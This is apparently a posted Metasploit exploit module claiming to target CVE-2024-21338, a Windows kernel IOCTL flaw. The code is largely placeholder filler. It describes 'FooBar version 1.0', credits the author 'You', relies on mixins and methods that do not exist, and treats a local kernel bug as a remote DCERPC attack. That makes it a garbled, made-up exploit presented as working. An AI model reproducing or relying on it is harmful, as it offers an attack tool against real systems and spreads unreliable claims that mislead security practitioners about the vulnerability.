############################################# # Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 # # # This module requires Metasploit: https://metasploit.com/download # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Security Risk : High # # # # # ############################################# require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2024-21338 Exploit', 'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.', 'Author' => 'You', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-21338'] ] ) ) register_options( [ OptString.new('RHOST', [true, 'The target address', '127.0.0.1']), OptPort.new('RPORT', [true, 'The target port', 1234]) ] ) end def check connect begin impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar') rescue Rex::Post::Meterpreter::RequestError return Exploit::CheckCode::Safe end Exploit::CheckCode::Appears end def exploit connect begin impacket_artifact( dcerpc_binding('ncacn_ip_tcp'), 'FooBar', datastore['FooBarPayload'] ) rescue Rex::Post::Meterpreter::RequestError fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact' end handler disconnect end end #refrence : https://nvd.nist.gov/vuln/detail/CVE-2024-21338